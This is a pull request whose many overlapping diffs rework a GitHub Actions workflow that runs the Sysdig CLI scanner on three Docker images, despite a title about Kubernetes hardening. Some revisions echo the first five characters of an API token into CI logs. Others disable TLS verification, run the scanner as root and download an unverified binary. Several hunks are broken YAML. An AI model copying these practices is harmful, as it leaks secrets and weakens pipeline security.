### PR TITLE
Harden Kubernetes IaC for vote, worker, result (Sysdig Best Practices)

### DIFF
--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,0 +1,1 @@
+404: Not Found

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -19,7 +19,7 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Run Sysdig CLI Scanner (with CLI flags)
+      - name: Run Sysdig CLI Scanner (Dockerized)
         env:
           SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
         run: |
@@ -27,20 +27,20 @@ jobs:
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
               --apiurl https://app.au1.sysdig.com \
-              --client-token $SECURE_API_TOKEN \
+              --token $SECURE_API_TOKEN \
               docker://voting-app
 
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
               --apiurl https://app.au1.sysdig.com \
-              --client-token $SECURE_API_TOKEN \
+              --token $SECURE_API_TOKEN \
               docker://worker
 
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
               --apiurl https://app.au1.sysdig.com \
-              --client-token $SECURE_API_TOKEN \
+              --token $SECURE_API_TOKEN \
               docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -28,7 +28,7 @@ jobs:
           SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
         run: |
-          ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app
-          ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker
-          ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result
+          ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app
+          ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker
+          ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -20,11 +20,12 @@ jobs:
           docker build -t result ./result
 
       - name: Download Sysdig CLI Scanner
-        run: |
-          LATEST_VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)
-          curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${LATEST_VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner
-          chmod +x sysdig-cli-scanner
-          ./sysdig-cli-scanner version
+        run: | 
+　　　　　version=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)
+    　　　echo "Latest version is $version"
+    　　　curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${version}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner
+    　　　chmod +x sysdig-cli-scanner
+    　　　./sysdig-cli-scanner --version
       - name: Run Sysdig Image Scan
         env:
           SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,16 +1,15 @@
 name: Sysdig Image Scan
 
 on:
+  workflow_dispatch:
   push:
     branches:
       - main
-  workflow_dispatch:
 
 jobs:
   image-scan:
     runs-on: ubuntu-latest
 
-    # 🧪 環境変数の注入（Secretsから取得）
     env:
       SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
       SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
@@ -19,39 +18,51 @@ jobs:
       - name: 🛎️ Checkout code
         uses: actions/checkout@v3
 
-      - name: 🏗️ Build Docker images
+      - name: 🧱 Build Docker images
         run: |
           docker build -t voting-app ./vote
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: 🔍 Run Sysdig Scan (voting-app)
+      - name: 🔍 Scan voting-app with Sysdig
         run: |
           docker run --rm \
+            --platform linux/amd64 \
+            --user 0 \
+            -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-            scan \
-            --apiurl $SYS_DIG_SECURE_URL \
-            --token $SECURE_API_TOKEN \
-            docker://voting-app
+              --apiurl $SYS_DIG_SECURE_URL \
+              --loglevel debug \
+              --skiptlsverify \
+              docker://voting-app
 
-      - name: 🔍 Run Sysdig Scan (worker)
+      - name: 🔍 Scan worker with Sysdig
         run: |
           docker run --rm \
+            --platform linux/amd64 \
+            --user 0 \
+            -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-            scan \
-            --apiurl $SYS_DIG_SECURE_URL \
-            --token $SECURE_API_TOKEN \
-            docker://worker
+              --apiurl $SYS_DIG_SECURE_URL \
+              --loglevel debug \
+              --skiptlsverify \
+              docker://worker
 
-      - name: 🔍 Run Sysdig Scan (result)
+      - name: 🔍 Scan result with Sysdig
         run: |
           docker run --rm \
+            --platform linux/amd64 \
+            --user 0 \
+            -v "${{ github.workspace }}/scan-logs:/home/nonroot/scan-logs" \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-            scan \
-            --apiurl $SYS_DIG_SECURE_URL \
-            --token $SECURE_API_TOKEN \
-            docker://result
+              --apiurl $SYS_DIG_SECURE_URL \
+              --loglevel debug \
+              --skiptlsverify \
+              docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -13,6 +13,7 @@ env:
 jobs:
   image-scan:
     runs-on: ubuntu-latest
+
     steps:
       - name: Checkout code
         uses: actions/checkout@v3
@@ -30,7 +31,7 @@ jobs:
             quay.io/sysdig/sysdig-cli-scanner:latest \
             scan docker://voting-app \
             --apiurl $SYS_DIG_SECURE_URL \
-            --client-token $SECURE_API_TOKEN
+            --token $SECURE_API_TOKEN
 
       - name: Run Sysdig Scan on worker
         run: |
@@ -39,7 +40,7 @@ jobs:
             quay.io/sysdig/sysdig-cli-scanner:latest \
             scan docker://worker \
             --apiurl $SYS_DIG_SECURE_URL \
-            --client-token $SECURE_API_TOKEN
+            --token $SECURE_API_TOKEN
 
       - name: Run Sysdig Scan on result
         run: |
@@ -48,5 +49,5 @@ jobs:
             quay.io/sysdig/sysdig-cli-scanner:latest \
             scan docker://result \
             --apiurl $SYS_DIG_SECURE_URL \
-            --client-token $SECURE_API_TOKEN
+            --token $SECURE_API_TOKEN
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -10,7 +10,7 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout code
+      - name: Checkout source
         uses: actions/checkout@v3
 
       - name: Build Docker images
@@ -21,19 +21,18 @@ jobs:
 
       - name: Download Sysdig CLI Scanner
         run: |
-          echo "Fetching latest scanner version..."
           VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)
           echo "Latest version: $VERSION"
           curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner
           chmod +x sysdig-cli-scanner
           ./sysdig-cli-scanner --version
 
-      - name: Run Sysdig Scan
+      - name: Run Sysdig CLI Scanner
         env:
           SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
         run: |
-          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app
-          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker
-          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result
+          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app
+          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker
+          ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -11,48 +11,48 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-      - name: 🛎️ Checkout code
+      - name: Checkout code
         uses: actions/checkout@v3
 
-      - name: 🧱 Build Docker images
+      - name: Build Docker images
         run: |
           docker build -t voting-app ./vote
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: 🔍 Scan with Sysdig (voting-app)
+      - name: Run Sysdig Scan (voting-app)
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl https://app.au1.sysdig.com \
               --loglevel info \
               --skiptlsverify \
               docker://voting-app
 
-      - name: 🔍 Scan with Sysdig (worker)
+      - name: Run Sysdig Scan (worker)
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl https://app.au1.sysdig.com \
               --loglevel info \
               --skiptlsverify \
               docker://worker
 
-      - name: 🔍 Scan with Sysdig (result)
+      - name: Run Sysdig Scan (result)
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl https://app.au1.sysdig.com \
               --loglevel info \

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -20,45 +20,39 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: 🛡️ Scan voting-app with Sysdig
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+      - name: 🔍 Scan with Sysdig (voting-app)
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl https://app.au1.sysdig.com \
               --loglevel info \
               --skiptlsverify \
               docker://voting-app
 
-      - name: 🛡️ Scan worker with Sysdig
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+      - name: 🔍 Scan with Sysdig (worker)
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl https://app.au1.sysdig.com \
               --loglevel info \
               --skiptlsverify \
               docker://worker
 
-      - name: 🛡️ Scan result with Sysdig
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+      - name: 🔍 Scan with Sysdig (result)
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
               --apiurl https://app.au1.sysdig.com \
               --loglevel info \

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -23,9 +23,11 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Set SECURE_API_TOKEN env and debug
+      - 
+        name: Debug: Check if SECURE_API_TOKEN is available
+        env:
+          SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}"
         run: |
-          export SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}"
           echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
           echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
           if [ -z "$SECURE_API_TOKEN" ]; then
@@ -37,15 +39,5 @@ jobs:
 
       - name: Run Sysdig Scan (voting-app)
         run: |
-          docker run --rm \
-            --platform linux/amd64 \
-            --user 0 \
-            -v "$(pwd)/scan-logs:/home/nonroot/scan-logs" \
-            -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
-            quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl "$SYS_DIG_SECURE_URL" \
-              --loglevel debug \
-              --skiptlsverify \
-              docker://voting-app
+          docker run --rm             --platform linux/amd64             --user 0             -v "$(pwd)/scan-logs:/home/nonroot/scan-logs"             -v /var/run/docker.sock:/var/run/docker.sock             -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}"             quay.io/sysdig/sysdig-cli-scanner:1.22.4               --apiurl "$SYS_DIG_SECURE_URL"               --loglevel debug               --skiptlsverify               docker://voting-app
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -2,19 +2,19 @@ name: Sysdig Image Scan
 
 on:
   push:
-    branches: [main]
+    branches:
+      - main
   workflow_dispatch:
 
 env:
-  SYSDIG_SECURE_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
   SYSDIG_SECURE_URL: https://app.au1.sysdig.com
 
 jobs:
-  scan:
+  image-scan:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout source
+      - name: Checkout code
         uses: actions/checkout@v3
 
       - name: Build Docker images
@@ -23,29 +23,27 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Run Sysdig Scan via Docker image (scan subcommand)
+      - name: Run Sysdig Scan on voting-app
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl $SYSDIG_SECURE_URL \
-              docker://voting-app
+              scan --apiurl $SYSDIG_SECURE_URL docker://voting-app
 
+      - name: Run Sysdig Scan on worker
+        run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl $SYSDIG_SECURE_URL \
-              docker://worker
+              scan --apiurl $SYSDIG_SECURE_URL docker://worker
 
+      - name: Run Sysdig Scan on result
+        run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \
+            -e SECURE_API_TOKEN="${{ secrets.SECURE_API_TOKEN }}" \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl $SYSDIG_SECURE_URL \
-              docker://result
+              scan --apiurl $SYSDIG_SECURE_URL docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,9 +1,8 @@
-name: Sysdig Image Scan
+name: Sysdig Docker Image Scan
 
 on:
   push:
-    branches:
-      - main
+    branches: [main]
   workflow_dispatch:
 
 env:
@@ -15,7 +14,7 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout code
+      - name: Checkout
         uses: actions/checkout@v3
 
       - name: Build Docker images
@@ -24,30 +23,30 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Run Sysdig Scan on voting-app
+      - name: Scan voting-app
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
             scan docker://voting-app \
-            --apiurl $SYS_DIG_SECURE_URL \
-            --token $SECURE_API_TOKEN
+              --apiurl "$SYS_DIG_SECURE_URL" \
+              --token "$SECURE_API_TOKEN"
 
-      - name: Run Sysdig Scan on worker
+      - name: Scan worker
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
             scan docker://worker \
-            --apiurl $SYS_DIG_SECURE_URL \
-            --token $SECURE_API_TOKEN
+              --apiurl "$SYS_DIG_SECURE_URL" \
+              --token "$SECURE_API_TOKEN"
 
-      - name: Run Sysdig Scan on result
+      - name: Scan result
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
             quay.io/sysdig/sysdig-cli-scanner:latest \
             scan docker://result \
-            --apiurl $SYS_DIG_SECURE_URL \
-            --token $SECURE_API_TOKEN
+              --apiurl "$SYS_DIG_SECURE_URL" \
+              --token "$SECURE_API_TOKEN"
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -2,8 +2,7 @@ name: Sysdig Image Scan
 
 on:
   push:
-    branches:
-      - main
+    branches: [main]
   workflow_dispatch:
 
 jobs:
@@ -11,8 +10,7 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout code
-        uses: actions/checkout@v3
+      - uses: actions/checkout@v3
 
       - name: Build Docker images
         run: |
@@ -22,14 +20,15 @@ jobs:
 
       - name: Download Sysdig CLI Scanner
         run: |
-          curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 -o scanner
+          curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner
           chmod +x scanner
 
-      - name: Run Sysdig Scan on voting-app
-        run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image voting-app
+      - name: Run Sysdig Scan
+        env:
+          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
+          SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
+        run: |
+          ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app
+          ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker
+          ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result
 
-      - name: Run Sysdig Scan on worker
-        run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image worker
-
-      - name: Run Sysdig Scan on result
-        run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image result

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -10,58 +10,68 @@ jobs:
   image-scan:
     runs-on: ubuntu-latest
 
+    env:
+      SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
+
     steps:
       - name: 🛎️ Checkout code
         uses: actions/checkout@v3
 
-      - name: 🏗️ Build Docker images
+      - name: 🐳 Build Docker images
         run: |
           docker build -t voting-app ./vote
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: 🔍 Run Sysdig Scan (voting-app)
+      - name: 🔍 DEBUG: Check if SECURE_API_TOKEN is available
+        run: |
+          echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
+          echo "🔍 Token Head: ${SECURE_API_TOKEN::5}"
+          if [ -z "$SECURE_API_TOKEN" ]; then
+            echo "❌ SECURE_API_TOKEN is NOT set!"
+            exit 1
+          else
+            echo "✅ SECURE_API_TOKEN is available."
+          fi
         env:
           SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+
+      - name: 🔍 Run Sysdig Scan (voting-app)
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl https://app.au1.sysdig.com \
+              --apiurl $SYS_DIG_SECURE_URL \
               --skiptlsverify \
+              --loglevel debug \
               docker://voting-app
 
       - name: 🔍 Run Sysdig Scan (worker)
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl https://app.au1.sysdig.com \
+              --apiurl $SYS_DIG_SECURE_URL \
               --skiptlsverify \
+              --loglevel debug \
               docker://worker
 
       - name: 🔍 Run Sysdig Scan (result)
-        env:
-          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           docker run --rm \
             --platform linux/amd64 \
             --user 0 \
-            -e SECURE_API_TOKEN=$SECURE_API_TOKEN \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SECURE_API_TOKEN=${{ secrets.SECURE_API_TOKEN }} \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              scan \
-              --apiurl https://app.au1.sysdig.com \
+              --apiurl $SYS_DIG_SECURE_URL \
               --skiptlsverify \
+              --loglevel debug \
               docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -23,9 +23,9 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Debug
+      - name: Debug: Check if SECURE_API_TOKEN is available
         env:
-          SECURE_API_TOKEN: "${{ secrets.SECURE_API_TOKEN }}"
+          SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
           echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
@@ -34,6 +34,7 @@ jobs:
             exit 1
           else
             echo "✅ SECURE_API_TOKEN is available."
+          fi
 
       - name: Run Sysdig Scan (voting-app)
         run: |

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -22,7 +22,7 @@ jobs:
 
       - name: Download Sysdig CLI Scanner
         run: |
-          curl -sLo scanner https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64
+          curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 -o scanner
           chmod +x scanner
 
       - name: Run Sysdig Scan on voting-app

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -1,4 +1,4 @@
-name: Sysdig Docker Image Scan
+name: Sysdig Image Scan
 
 on:
   push:
@@ -6,8 +6,8 @@ on:
   workflow_dispatch:
 
 env:
-  SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
-  SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+  SYSDIG_SECURE_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
+  SYSDIG_SECURE_URL: https://app.au1.sysdig.com
 
 jobs:
   scan:
@@ -23,26 +23,29 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Run Sysdig CLI Scanner via Docker
+      - name: Run Sysdig Scan via Docker image (scan subcommand)
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --token $SECURE_API_TOKEN \
+              scan \
+              --apiurl $SYSDIG_SECURE_URL \
               docker://voting-app
 
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --token $SECURE_API_TOKEN \
+              scan \
+              --apiurl $SYSDIG_SECURE_URL \
               docker://worker
 
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
+            -e SYSDIG_SECURE_TOKEN=$SYSDIG_SECURE_TOKEN \
             quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-              --apiurl $SYS_DIG_SECURE_URL \
-              --token $SECURE_API_TOKEN \
+              scan \
+              --apiurl $SYSDIG_SECURE_URL \
               docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -28,7 +28,7 @@ jobs:
           SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
         run: |
           echo "🔍 Token Length: ${#SECURE_API_TOKEN}"
-          echo "🔍 Token Head: ${SECURE_API_TOKEN::5}"
+          echo "🔍 Token Head: ${SECURE_API_TOKEN:0:5}"
           if [ -z "$SECURE_API_TOKEN" ]; then
             echo "❌ SECURE_API_TOKEN is NOT set!"
             exit 1

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -6,15 +6,15 @@ on:
   workflow_dispatch:
 
 env:
-  SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
   SYS_DIG_SECURE_URL: https://app.au1.sysdig.com
+  SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}
 
 jobs:
-  image-scan:
+  scan:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout
+      - name: Checkout source
         uses: actions/checkout@v3
 
       - name: Build Docker images
@@ -23,30 +23,26 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Scan voting-app
+      - name: Run Sysdig CLI Scanner via Docker
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            quay.io/sysdig/sysdig-cli-scanner:latest \
-            scan docker://voting-app \
-              --apiurl "$SYS_DIG_SECURE_URL" \
-              --token "$SECURE_API_TOKEN"
+            quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+              --apiurl $SYS_DIG_SECURE_URL \
+              --token $SECURE_API_TOKEN \
+              docker://voting-app
 
-      - name: Scan worker
-        run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            quay.io/sysdig/sysdig-cli-scanner:latest \
-            scan docker://worker \
-              --apiurl "$SYS_DIG_SECURE_URL" \
-              --token "$SECURE_API_TOKEN"
+            quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+              --apiurl $SYS_DIG_SECURE_URL \
+              --token $SECURE_API_TOKEN \
+              docker://worker
 
-      - name: Scan result
-        run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            quay.io/sysdig/sysdig-cli-scanner:latest \
-            scan docker://result \
-              --apiurl "$SYS_DIG_SECURE_URL" \
-              --token "$SECURE_API_TOKEN"
+            quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+              --apiurl $SYS_DIG_SECURE_URL \
+              --token $SECURE_API_TOKEN \
+              docker://result
 

--- a/.github/workflows/scan.yml
+++ b/.github/workflows/scan.yml
@@ -10,7 +10,7 @@ jobs:
     runs-on: ubuntu-latest
 
     steps:
-      - name: Checkout
+      - name: Checkout code
         uses: actions/checkout@v3
 
       - name: Build Docker images
@@ -19,29 +19,28 @@ jobs:
           docker build -t worker ./worker
           docker build -t result ./result
 
-      - name: Run Sysdig CLI Scanner (Dockerized)
+      - name: Run Sysdig CLI Scanner (with CLI flags)
         env:
-          SYSDIG_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
-          SYSDIG_API_URL: https://app.au1.sysdig.com
+          SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}
         run: |
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SYSDIG_API_TOKEN \
-            -e SYSDIG_API_URL \
-            quay.io/sysdig/sysdig-cli-scanner \
+            quay.io/sysdig/sysdig-cli-scanner:latest \
+              --apiurl https://app.au1.sysdig.com \
+              --client-token $SECURE_API_TOKEN \
               docker://voting-app
 
           docker run --rm \
             -v /var/run/docker.sock:/var/run/docker.sock \
-            -e SYSDIG_API_TOKEN \
-            -e SYSDIG_API_URL \
-            quay.io/sysdig/sysdig-cli-scanner \
+            quay.io/sysdig/sysdig-cli-scanner:latest \
+              --apiurl https://app.au1.sysdig.com \
+              --client-token $SECURE_API_TOKEN \
               docker://worker
 
           docker run --rm \
